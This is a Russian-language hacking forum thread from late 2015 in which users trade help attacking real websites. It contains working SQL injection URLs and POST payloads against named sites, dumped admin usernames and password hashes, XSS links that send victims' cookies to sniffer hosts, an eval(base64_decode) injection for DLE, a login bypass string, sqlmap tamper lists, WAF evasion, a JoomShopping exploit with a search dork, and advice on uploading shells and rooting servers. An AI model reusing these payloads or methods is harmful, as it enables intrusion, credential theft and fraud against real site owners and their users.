При добавлении коментария Если добавлть html код, он отлично врезается в страницу и выполняется, java script тоже выполняется. А вот когда добавляешь php код например то он не выполняется потому что стоит какой то чудо фильтр на
Konqi,
капать там больше некуда) вот добавили этот баговый коментарий к добавлению мембера в ЧС)


это так не работает. даже если внедрить код php, он не будет выполнен. там HTML Injection, а не Code Injection. копать есть куда, я вам предложил - Stored XSS через CSRF

Br@!ns
06.11.2015, 22:53
Какими способами можно обойти git? нужно поправить скрипт, который не находится в .gitignore? админ постоянно палит. Прощу советов

spherics
07.11.2015, 02:57
BabaDook said:
↑ (https://antichat.live/posts/3910459/)

PHP:
http://www.matrasmax.ru/konfigurator/?on_page=15&price_active=0&height_active=0&type=&size=131&producer_46=on&producers=&price_from=0&price_to=12000&materials=&stronger1=ТУТ &stronger2=&text=&action=apply_filter

Инъекция?


Вот иньекция


PHP:
http://www.matrasmax.ru/mattress/?other-sizes=421792+order+by+10000--

SaNDER
07.11.2015, 10:29
Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?

Если да то как ?

Konqi
07.11.2015, 10:47
SaNDER said:
↑ (https://antichat.live/posts/3912243/)
Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?
Если да то как ?


Какие то странные вопросы озвучиваете. Если ваша иньекция дает возможность выполнения UPDATE запросов то можно изменить все что хотите (а точнее то к чему есть доступ).

//но кэп подсказывает что с магазинами играть не стоит

AlexG
07.11.2015, 10:51
SaNDER said:
↑ (https://antichat.live/posts/3912243/)
Возможно ли сделать себе больше денег или снизить цену на сайте-магазине,имея при этом SQL Inj?
Если да то как ?


Такое впечатлние что вы никогда админку шопа не видели (да и в принципе не понимаете как движки шопов работают). Если нет доступа к UPDATE - админская (манагерская) учетка - в админке делаем все что хотим.

ПыСы И прокатит такое только с цифровыми товарами, и то, далеко не всегда.

BabaDook
07.11.2015, 10:57
spherics said:
↑ (https://antichat.live/posts/3912187/)
Вот иньекция

PHP:
http://www.matrasmax.ru/mattress/?other-sizes=421792+order+by+10000--



Спасибо. за ответ.

WallHack
09.11.2015, 19:58
Нашел 4 LFI не могу эксплуатировать мешает эта СРАНЬ (https://www.ukraine.com.ua/faq/error-424.html#!8)

Можно обойти ?

hpol
10.11.2015, 01:25
palec2006 said:
↑ (https://antichat.live/posts/3913446/)
спалите как в DLE напихать, админ есть


настройки видеоплеера

ширина проигрывателя aaa\

длина проигрывателя .eval(base64_decode(тут код)),//

в ширине экранируем кавычку в длине в конце коментируем

Hussar
10.11.2015, 20:08
Эксплуатирую XSS и тут появился такой вопрос. Отправляю ссылку жертве с этим кодом

document.location.replace(%27http://доменснифера.ком/sniff.php?с=doсument.сookie%27 (http://www.securitylab.ru/bitrix/exturl.php?goto=http://%E4%EE%EC%E5%ED%F1%ED%E8%F4%E5%F0%E0.%EA%EE%EC/sniff.php?%F1=do%F1ument.%F1ookie%27)) и в логах появляется это - %C3%B1=do%C3%B1ument.%C3%B1ookie

Все делаю как надо, а куки левые приходят, вставлял их в браузер и не получилось зайти от админа. Подскажите, в чем загвоздка?

faza02
10.11.2015, 23:17
Hussar said:
↑ (https://antichat.live/posts/3913739/)
Эксплуатирую XSS и тут появился такой вопрос. Отправляю ссылку жертве с этим кодом
document.location.replace(%27
http://доменснифера.ком/sniff.php?с=doсument.сookie%27 (http://www.securitylab.ru/bitrix/exturl.php?goto=http://%E4%EE%EC%E5%ED%F1%ED%E8%F4%E5%F0%E0.%EA%EE%EC/sniff.php?%F1=do%F1ument.%F1ookie%27)
) и в логах появляется это -
%C3%B1=do%C3%B1ument.%C3%B1ookie
Все делаю как надо, а куки левые приходят, вставлял их в браузер и не получилось зайти от админа. Подскажите, в чем загвоздка?


у вас неверный код, который отправляет куки на сниффер. да еще и с русскими буквами внутри. прочитайте статью про XSS в разделе статей, там корректные примеры

kacergei
11.11.2015, 16:27
Нашел сканером на одном сайте уязвимость, сканер проверил подтвердил и выдал sql-injection

.SpoilerTarget" type="button">Spoiler: POST параметр:


Code:
Home%5bokno%5d%5b%5d=-1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1) %3e(SELECT+COUNT(*)%2cCONCAT(CHAR(110)%2cCHAR(115) %2cCHAR(124)%2cCHAR(124)%2cCHAR(49)%2cCHAR(49)%2cC HAR(49)%2cCHAR(53)%2cCHAR(56)%2cCHAR(54)%2cCHAR(49 )%2cCHAR(52)%2cCHAR(54)%2cCHAR(57)%2cCHAR(124)%2cC HAR(124)%2cCHAR(110)%2cCHAR(115)%2c0x3a%2cFLOOR(RA ND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROU P+BY+x)a)%2b%22

То есть:


Code:
Home[okno][]=-1"+and+6=3+or+1=1+(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(ns||1115861469||ns,0x3a,FL OOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATION S+GROUP+BY+x)a)+"


Какие параметры указать в tamper? Пробовал between (вплоть до space2plus.py) как правильнее будет?

P.S> Походу это я что то косячу...

Погуглил прочитал что некоторые сразу все указывают, типо:


Code:
tamper=between,bluecoat,charencode,charunicodeenco de,concat2concatws,equaltolike,greatest,halfversio nedmorekeywords,ifnull2ifisnull,modsecurityversion ed,modsecurityzeroversioned,multiplespaces,nonrecu rsivereplacement,percentage,randomcase,securespher e,space2comment,space2hash,space2morehash,space2my sqldash,space2plus,space2randomblank,unionalltouni on,unmagicquotes,versionedkeywords,versionedmoreke ywords,xforwardedfor

От этого же может и не быть результата? И как правильнее выяснить какой именно тебе использовать?

SaNDER
11.11.2015, 19:29
kacergei said:
↑ (https://antichat.live/posts/3914095/)
Нашел сканером на одном сайте уязвимость, сканер проверил подтвердил и выдал sql-injection
Spoiler: POST параметр:

Code:
Home%5bokno%5d%5b%5d=-1%22+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1) %3e(SELECT+COUNT(*)%2cCONCAT(CHAR(110)%2cCHAR(115) %2cCHAR(124)%2cCHAR(124)%2cCHAR(49)%2cCHAR(49)%2cC HAR(49)%2cCHAR(53)%2cCHAR(56)%2cCHAR(54)%2cCHAR(49 )%2cCHAR(52)%2cCHAR(54)%2cCHAR(57)%2cCHAR(124)%2cC HAR(124)%2cCHAR(110)%2cCHAR(115)%2c0x3a%2cFLOOR(RA ND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROU P+BY+x)a)%2b%22

То есть:

Code:
Home[okno][]=-1"+and+6=3+or+1=1+(SELECT+1+and+ROW(1,1)>(SELECT+COUNT(*),CONCAT(ns||1115861469||ns,0x3a,FL OOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATION S+GROUP+BY+x)a)+"

Какие параметры указать в tamper? Пробовал between (вплоть до space2plus.py) как правильнее будет?
P.S> Походу это я что то косячу...
Погуглил прочитал что некоторые сразу все указывают, типо:

Code:
tamper=between,bluecoat,charencode,charunicodeenco de,concat2concatws,equaltolike,greatest,halfversio nedmorekeywords,ifnull2ifisnull,modsecurityversion ed,modsecurityzeroversioned,multiplespaces,nonrecu rsivereplacement,percentage,randomcase,securespher e,space2comment,space2hash,space2morehash,space2my sqldash,space2plus,space2randomblank,unionalltouni on,unmagicquotes,versionedkeywords,versionedmoreke ywords,xforwardedfor

От этого же может и не быть результата? И как правильнее выяснить какой именно тебе использовать?


Что бы сканер не писал,не факт что это Sql Inj . Сам по себе знаю,тоже думал SQL inj,а оказалось это сканер так подумал .

Br@!ns
11.11.2015, 23:27
Что интересного можно узнать через уязвимость, где позволяется юзать функции без аргументов?

какие есть интересные функции для данного случая?

kacergei
12.11.2015, 01:19
Code:
Запрос: 1" and(UpdateXML(0x03b,concat(0x3b,(select table_name FROM information_schema.tables limit 1,1)),0x03b))="
Результат: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ';COLLATIONS'

Как автоматизировать сборку таблиц и колонок? Сколько искал в основном все под win либо не подходит

justonline
12.11.2015, 01:46
deleted. Позор мне, тупящему

AlexG
12.11.2015, 08:06
o314um said:
↑ (https://antichat.live/posts/3914352/)
Кто сможет обойти фильтр?
Ну очень интересный
тут не выходит почему-то, дает 403. Как видно - 3 скули по фрагментам

Code:
http://empleos.net/candidatov2/seccion/vacantes/resultados.php
?filtro[Claves]=
&filtro[Area]=11 union /*
&filtro[Pais]=16*/ select /*
&filtro[Estado]=2*/ 1,2,3%23
&filtro[Desde]=
&filtro[Hasta]=
&back=/candidatov2/seccion/vacantes/index.php
?avanzado

есть еще:
В POST параметрах. 1 столбец, но все равно что-то там плохое происходит

Code:
http://empleos.net/sel_reg.php
post data:
SubmitRevisar=Revisar
&Email=1' and 1>2 union/*!0000select*/1%23

На сайте очень много таких скулей, но этот ВАФ очень интересно обойти


Не совсем понял пример про ВАФ. Нашел свой вариант -


Code:
http://empleos.net/v2_candidatos_buscarVacantes.php?filtro[Claves]=12&filtro[Area]=43 /*!50000union*/ select 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&filtro[Pais]=20&filtro[Estado]=416&filtro[Desde]=2015-11-25&filtro[Hasta]=2015-11-28

ВАФ в данном случае срабатывает на union, обходится элементарно. Но есть "но" - через order by получается что 14 колонок, но при попытке вывода что выше написал - "different number of columns". Видимо не так что-то делаю.

T1B3R
13.11.2015, 00:27
Как вывести всю информацию, если вывод идет через ошибку, максимум могу посмотреть 30 символов...

Например:

1105 - XPATH syntax error: ':1:admin:$2y$10$l9rcQOpA52n9' SQL=SELECT f.*,al.*,

Konqi
13.11.2015, 00:32
T1B3R said:
↑ (https://antichat.live/posts/3914780/)
Как вывести всю информацию, если вывод идет через ошибку, максимум могу посмотреть 30 символов...
Например:
1105 - XPATH syntax error: '
:1:admin:$2y$10$l9rcQOpA52n9
' SQL=SELECT f.*,al.*,


кто отменял substring?

Br@!ns
13.11.2015, 01:45
T1B3R said:
↑ (https://antichat.live/posts/3914780/)
Как вывести всю информацию, если вывод идет через ошибку, максимум могу посмотреть 30 символов...
Например:
1105 - XPATH syntax error: '
:1:admin:$2y$10$l9rcQOpA52n9
' SQL=SELECT f.*,al.*,


или тот же mid.

faza02
13.11.2015, 01:56
Br@!ns said:
↑ (https://antichat.live/posts/3914811/)
или тот же mid.


или тот же substr? это аналогичные функции, не обязательно упоминать каждую

jjokker
17.11.2015, 05:40
Paladin said:
↑ (https://antichat.live/posts/3908069/)
http://kvestsetevichok.ru/index.php/press?view=category&id=' (http://kvestsetevichok.ru/index.php/press?view=category&id=%27)
что то можно сделать? ибо не получается изменить запрос никак




Br@!ns said:
↑ (https://antichat.live/posts/3908147/)
Зачем вы кавычку вконце поставили я вообще не пойму.
Unknown column 'root' in 'where clause'
Обычная ошибка бд, никакой sql inj




Code:
http://kvestsetevichok.ru/index.php?no_html=1&tmpl=component&option=com_surveyforce&task=survey.SF_ajaxAction
[POST]action=next&survey=1&start_id=21133&user_id=449c373991919e6a22eca19c18e4b11c&quest_id[]=21 or (select count(*) from information_schema.columns group by concat((select concat_ws(0x3a,substring(username,1,50),substring( password,1,50)) from nvehp_users limit 0,1),0x3a,floor(rand(0)*2)))--&answer[]=152

Duplicate entry 'main:$2y$10$I4IqeXwMb5JkzFTTvEXQW.r71Nq/14JJgiIk75jsSK1:1' for key 'group_key'
Duplicate entry '83195:1' for key 'group_key'
Duplicate entry 'sergrus_kvest15@localhost::5.5.36-34.0-632.prec::sergrus_kvest15'

.:[melkiy]:.
17.11.2015, 12:32
какая колонка в таблице %_users определяет админа сайта в послених версиях джумлы?

в предыдущих было usertype=Super Administrator

AlexG
19.11.2015, 21:34
SaNDER said:
↑ (https://antichat.live/posts/3917683/)
На сайте ASP при смене пароля поставил 8 кавычек и он успешно сохранил пароль,но не ошибок,нечего не было . Это нормально? .


Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет.

SaNDER
20.11.2015, 12:49
AlexG said:
↑ (https://antichat.live/posts/3917766/)
Ну так теперь попробуйте залогиниться и узнаете. А вообще - скорее нормально, чем нет.


фишка в том,что я теперь не могу попасть в аккаунт .

RWD
22.11.2015, 23:11
нашел сайт, при переходе в .git/index скачивается файл

как заюзать? спасибо

Vip77
22.11.2015, 23:15
скинь содержимое файла

RWD
22.11.2015, 23:24
Vip77 said:
↑ (https://antichat.live/posts/3918815/)
скинь содержимое файла


там в основном пути wp-content/plugins/ и т.д

Vip77
23.11.2015, 00:12
в таких файлах бывает можно найти пути к интересным файлам, через которые можно залиться.

но если там только пути к плагинам, то вряд ли что-то можно сделать, кроме как проверить их на уязвимости

RWD
23.11.2015, 00:17
а если вот так сделать?

Strilo4ka
23.11.2015, 05:15
RWD said:
↑ (https://antichat.live/posts/3918812/)
нашел сайт, при переходе в .git/index скачивается файл
как заюзать? спасибо


склонируйте репозиторий, это же банально и легко гуглится

RWD
23.11.2015, 11:57
Strilo4ka said:
↑ (https://antichat.live/posts/3918895/)
склонируйте репозиторий, это же банально и легко гуглится


пробовал, но похоже что в сам .git

Forbidden

You don't have permission to access /.git/ on this server.

, а если добавить /index, то качается файл index размером чуть больше 450кб

Strilo4ka
23.11.2015, 12:00
RWD said:
↑ (https://antichat.live/posts/3918940/)
пробовал, но похоже что в сам .git
Forbidden
You don't have permission to access /.git/ on this server.
, а если добавить /index, то качается файл index размером чуть больше 450кб


https://rdot.org/forum/showpost.php?p=32395&postcount=81

RWD
23.11.2015, 22:12
Strilo4ka said:
↑ (https://antichat.live/posts/3918941/)
https://rdot.org/forum/showpost.php?p=32395&postcount=81


вообщем загрузил файл в git репозиторий, получил список, затем git checkout db-config.php и ничего не происходит. Все команды делаю в репозитории.

Git выдаст сообщение об ошибке, т.к. запрашиваемый объект отсутствует в локальном репозитории этого не происходит

Что я делаю не так?

RWD
24.11.2015, 04:31
RWD said:
↑ (https://antichat.live/posts/3919189/)
вообщем загрузил файл в git репозиторий, получил список, затем git checkout db-config.php и ничего не происходит. Все команды делаю в репозитории.
Git выдаст сообщение об ошибке, т.к. запрашиваемый объект отсутствует в локальном репозитории этого не происходит

Что я делаю не так?


все понятно, но это работает только если есть доступ к git репозитории, а здесь только к файлу index

Hussar
24.11.2015, 09:15
Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.

AlexG
24.11.2015, 11:47
Hussar said:
↑ (https://antichat.live/posts/3919332/)
Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.


Если я правильно понял


Code:
http://www.alfa.com.tw/search.php?keyword=">document.location.href='http://google.com'

Проверял только в тор-браузере. Работает.

faza02
24.11.2015, 13:22
Hussar said:
↑ (https://antichat.live/posts/3919332/)
Скиньте примеры ссылки, которая отправляется жертве при эксплуатации XSS. Желательно с document.location ... Тысячу раз перепробовал, все никак.


может вы имеете ввиду window.location? какая атака? кража кук?

window.location = "http://sniffer.ru/? (http://sniffer.ru/)"+document.cookie

sysjuk
25.11.2015, 21:21
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pc ntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,p cntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcn tl_signal,pcntl_signal_dispatch,pcntl_get_last_err or,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaiti nfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriorit y,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pc ntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,p cntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcn tl_signal,pcntl_signal_dispatch,pcntl_get_last_err or,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaiti nfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriorit y,pcntl_setpriority,

Какие варианты могут быть залития шелла, ипб fopen не пашет)

XAMEHA
25.11.2015, 21:24
У вас нет в списке fopen.

t0ma5
25.11.2015, 22:09
sysjuk said:
↑ (https://antichat.live/posts/3920019/)
disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pc ntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,p cntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcn tl_signal,pcntl_signal_dispatch,pcntl_get_last_err or,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaiti nfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriorit y,pcntl_setpriority, pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pc ntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,p cntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcn tl_signal,pcntl_signal_dispatch,pcntl_get_last_err or,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaiti nfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriorit y,pcntl_setpriority,
Какие варианты могут быть залития шелла, ипб fopen не пашет)


php код значит выполнять можно? раз говоришь fopen не пашет

file_put_contents ? может просто прав на запись нет?

вообще среди запрещенных функций не вижу system/passthru, может сразу с консолью работать?

sysjuk
25.11.2015, 22:25
XAMEHA said:
↑ (https://antichat.live/posts/3920022/)
У вас нет в списке fopen.


Добрый вечер, спасибо вам за ответ.

Файл создается, но вот беда, в него ничего не записывается.

Что может быть причиной?

ps: я еще нахожусь в админки ipb, заливаю через настройки, файл создается но в него ничего не записывается.

sysjuk
26.11.2015, 11:55
Есть еще один вопрос, вообщем попробую вам объяснить ситуацию, есть сайт моментальных товаров, лазил по нему нашел одну уязвимость как я понимаю sql уязвимость!

В административной панели в авторизации мною была найдена ошибка, а именно когда я подставлял за место логина и пароля " ' OR 'a'='a ", то я проходил авторизацию, но на данном веб-сервере имеются еще сайты/форумы и все они созданы под одним аккаунтом, мне необходимо вытащить данные что бы залить к примеру шелл, в админки вообще нету никаких заливалок файлов, а главное если я допустим вставляю "

winstrool
26.11.2015, 15:13
[QUOTE="sysjuk"]
sysjuk said:
↑ (https://antichat.live/posts/3920206/)
Есть еще один вопрос, вообщем попробую вам объяснить ситуацию, есть сайт моментальных товаров, лазил по нему нашел одну уязвимость как я понимаю sql уязвимость!
В административной панели в авторизации мною была найдена ошибка, а именно когда я подставлял за место логина и пароля " ' OR 'a'='a ", то я проходил авторизацию, но на данном веб-сервере имеются еще сайты/форумы и все они созданы под одним аккаунтом, мне необходимо вытащить данные что бы залить к примеру шелл, в админки вообще нету никаких заливалок файлов, а главное если я допустим вставляю "

sysjuk
27.11.2015, 01:42
winstrool said:
↑ (https://antichat.live/posts/3920293/)
Если вы банальным способом прошли авторизацию, значит вся админка кишит SQL-иньекциями, вот в ней и ковыряйтесь, может есть где файл конфига смены логин пасса? который скрыт под звездочками, а может и локальный инклуд заваляться при редактирование каких либо модулей, плагинов, вообщем без фантазии вы дальше не продвинитесь))
если файл создается значит идет выполнение кода, но что то у вас идет не так, попробуйте в сам файл куда вы вписываите код вставить сам шелл, как пример с тем же выводом по ГЕТ запросу, для мение палевности...
Вариантов море, учитесь смотреть другие разделы, гуглить,
/threads/307894/ (https://antichat.live/threads/307894/)
- Не стандартные способы заливки шелла
Вариантов море!


Спасибо поставил вам, шелл действительно удалось залить.

По поводу первого сайта, уязвимостей как раз больше и нету, только она одна была.

Что можете посоветовать?

Hussar
28.11.2015, 09:21
Нужно проэксплоатировать xss, пока делаю на тестовом сайте у себя на денвере, дело в том, что с помощью js выводятся не все куки.

var_dump($_COOKIE); выводит:

array(3) { ["wordpress_test_cookie"]=> string(15) "WP Cookie check" ["wordpress_logged_in_6db1d63adbfd940870bdcece524b53 b5"]=> string(49) "admin|1448819999|97ebc784204cf4131e6e5cbba0759665" ["wp-settings-time-1"]=> string(10) "1448647200" }

а alert( document.cookie ); :

wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1448647200

Как получить с помощью JS все куки?

faza02
28.11.2015, 11:16
Hussar said:
↑ (https://antichat.live/posts/3921003/)
Нужно проэксплоатировать xss, пока делаю на тестовом сайте у себя на денвере, дело в том, что с помощью js выводятся не все куки.
var_dump($_COOKIE); выводит:
array(3) { ["wordpress_test_cookie"]=> string(15) "WP Cookie check" ["wordpress_logged_in_6db1d63adbfd940870bdcece524b53 b5"]=> string(49) "admin|1448819999|97ebc784204cf4131e6e5cbba0759665" ["wp-settings-time-1"]=> string(10) "1448647200" }
а alert( document.cookie ); :
wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1448647200
Как получить с помощью JS все куки?


решите, куда задавать вопрос, мне в лс или сюда.

httponly?

Sensoft
29.11.2015, 02:21
Помогите не могу раскрутить SQLi

http://www.gamer-templates.de/imagehoster/mitglieder.php?seite=%27 (http://www.gamer-templates.de/imagehoster/mitglieder.php?seite=%2527)

SaNDER
29.11.2015, 13:05
Sensoft said:
↑ (https://antichat.live/posts/3921317/)
Помогите не могу раскрутить SQLi
http://www.gamer-templates.de/imagehoster/mitglieder.php?seite=%27 (http://www.gamer-templates.de/imagehoster/mitglieder.php?seite=%2527)


да тут вроде нету уязвимости .

DezMond™
30.11.2015, 16:09
http://www.bindergroesswang.at/en/people/all/?no_cache=1&name=a')+order+by+110+--+&area=34

Как вывести? union select не катит((

Sensoft
30.11.2015, 16:19
[SIZE="4"][B]Вопрос по vBulletin 4.0.x

Br@!ns
30.11.2015, 17:27
Sensoft said:
↑ (https://antichat.live/posts/3921859/)
Когда отсылаю POST запрос страница не перезагружается, почему ?


Вероятно у вас firefox версией выше 30, live http headers с версиями выше 30 не работает

Sensoft
30.11.2015, 17:44
Br@!ns said:
↑ (https://antichat.live/posts/3921880/)
Вероятно у вас firefox версией выше 30, live http headers с версиями выше 30 не работает


Спасибо чувак помог

ButilkaSoka
02.12.2015, 15:05
[QUOTE="Sensoft"]
Sensoft said:
↑ (https://antichat.live/posts/3921859/)
[SIZE="4"][B]Вопрос по vBulletin 4.0.x

xaj3uie
04.12.2015, 17:40
JoomShopping - Blind SQL Injection

# Exploit Title: [JoomShopping Blind Sql injection]

# Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"]

# Date: [2015-07-24]

# Exploit Author: [Mormoroth]

# Vendor Homepage: [http://www.webdesigner-profi.de]

# Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]

# Version: [All]

# Tested on: [Linux]

----------------------------

site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a

Кто-нибудь пробовал применять? Можно что-то из этого извлечь?

winstrool
04.12.2015, 21:42
xaj3uie said:
↑ (https://antichat.live/posts/3923503/)
Кто-нибудь пробовал применять? Можно что-то из этого извлечь?


Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....

Sensoft
04.12.2015, 21:57
winstrool said:
↑ (https://antichat.live/posts/3923591/)
Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....


# Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]

Где взять а то не робит ссылка

faza02
04.12.2015, 23:38
Sensoft said:
↑ (https://antichat.live/posts/3923598/)
# Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]
Где взять а то не робит ссылка


у вас там уже все есть. или вам плагин нужен?

Sensoft
04.12.2015, 23:39
yarbabin said:
↑ (https://antichat.live/posts/3923628/)
у вас там уже все есть. или вам плагин нужен?


Плагин

xaj3uie
05.12.2015, 12:52
winstrool said:
↑ (https://antichat.live/posts/3923591/)
Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....


Либо я не до конца понимаю, либо у меня версии не сходятся.

Установил на локалку 3.4 версию движка и скачал с официального сайта этот джумлашопинг.

Вставляю так:

test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a

.SpoilerTarget" type="button">Spoiler: Открыть
Получаю сообщение:

if(typeof(jQuery) != 'undefined') {jQuery.noConflict();}window.addEvent('load',funct ion(){wflSliders['wfls209 and 1=2-- a'] = new wflSlider({"ribbon_behavior":null,"duration":500,"effect_block":"single","id":"209 and 1=2-- a","orientation":"hor"})});
Вставляю вот так:

.SpoilerTarget" type="button">Spoiler: Ещё посмотреть
test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a'

Получаю:

Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''209 and 1=2-- a''' at line 3 SQL=SELECT params FROM bigmb_modules WHERE id='209 and 1=2-- a''


Получается, уязвимость присутствует и нужно лишь правильно составить запрос?

Направьте в нужное русло пожалуйста.

winstrool
05.12.2015, 16:04
Покажите конкретную площадку там и будем расуждать, тут походу ее еще как error разкрутить можно...

P.S: вот вам живой пример как Error-based

_ttp://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,version()))))+--+ (http://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,version()))))+--+)

в гугле площадки для тестов по дорку inurl:mod_jshopping_products_wfl/

xaj3uie
05.12.2015, 16:07
winstrool said:
↑ (https://antichat.live/posts/3923830/)
Покажите конкретную площадку там и будем расуждать, тут походу ее еще как error разкрутить можно...


Все эксперименты провожу на локалке...

Давайте залью на хостинг 3-ю джумлу и этот компонент - коллективно будем исследовать...

Что скажете?

BlitzXX
05.12.2015, 17:10
XSS:

фильтра нету,

Максимальное кол-во символов 32.

Как сделать?

Нахождение:


Code:
[XSS] бла-бла-бла...

Делал так, запрос идет, но не выполняется сам скрипт xss'ки. Проблема в (его нету)


Code:

xaj3uie
05.12.2015, 17:26
winstrool said:
↑ (https://antichat.live/posts/3923830/)
Покажите конкретную площадку там и будем расуждать, тут походу ее еще как error разкрутить можно...
P.S: вот вам живой пример как Error-based
_ttp://
www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,version()))))+--+ (http://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,version()))))+--+)
в гугле площадки для тестов по дорку inurl:mod_jshopping_products_wfl/


Эм, получили "Error displaying the error page: Application Instantiation Error: XPATH syntax error:". А как полезное из этого что-то получить?

RWD
05.12.2015, 19:58
вообще реально залить файл если sql time based blind? права mysql root

xaj3uie
07.12.2015, 15:37
winstrool said:
↑ (https://antichat.live/posts/3923830/)
Покажите конкретную площадку там и будем расуждать, тут походу ее еще как error разкрутить можно...
P.S: вот вам живой пример как Error-based
_ttp://
www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,version()))))+--+ (http://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,version()))))+--+)
в гугле площадки для тестов по дорку inurl:mod_jshopping_products_wfl/


Вы что-то реально показать можете, или лишь "умными сообщениями раскидываться"?

winstrool
07.12.2015, 19:16
xaj3uie said:
↑ (https://antichat.live/posts/3924468/)
Вы что-то реально показать можете, или лишь "умными сообщениями раскидываться"?


А вы что то реальное понять можете? если нет, идите свой уровень образования поднимайте, читая статьи и мануалы!

_ttp://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,0x3a,user(),database(),version()))) )+--+ (http://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,0x3a,user(),database(),version()))) )+--+)

Ответ:


XPATH syntax error: '::
admin_valentin@localhost:admin
' SQL


я вам показал вектор атаки, а вы крутите его уже сами!

Начните свой уровень изучив хотябы вот это:

/threads/43966/ (https://antichat.live/threads/43966/)

А потом задавайте свои детские вопросы, показывая свою нелепую важность...

P.S: Модеры, кто его выпустил из песочницы?

xaj3uie
07.12.2015, 19:24
winstrool said:
↑ (https://antichat.live/posts/3924571/)
А вы что то реальное понять можете? если нет, идите свой уровень образования поднимайте, читая статьи и мануалы!
_ttp://
www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,0x3a,user(),database(),version()))) )+--+ (http://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20 concat_ws(0x3a,0x3a,user(),database(),version()))) )+--+)
Ответ:
Начните свой уровень изучив хотябы вот это:
/threads/43966/ (https://antichat.live/threads/43966/)
А потом задавайте свои детские вопросы, показывая свою нелепую важность...
P.S: Модеры, кто его выпустил из песочницы?


Да читал, иногда нужно спросить и убедиться.

Вот только на мои детские вопросы вы конкретно так и не ответили!

P.s. модерам спасибо, все мы когда-то были новички...

UNIXTREID
07.12.2015, 20:28
Извиняюсь за вопросы, гуглил, но как-то выдача не удалась...

1)Есть ли какие-то недавние рабочие RCE под такие сервисы???

nginx 1.6.2

Microsoft IIS 6.0

ASP.NET 1.1.4322

ASP.NET 2.0.50727

2)И ещё один вопрос: зависят ли как-то версии компонентов Joomla от основной версии самой Joomla ??? Существуют ли какие-то удобные, к примеру, таблицы, где чётко сопоставляются версия компонента с версией самой CMS ??? Или компоненты обновляются только с версией CMS ? Просто чтобы раскручивать сайт, узнал версию джумлы и её установленные дополнения, вот и думаю, по какой версии подбирать эксплоит...

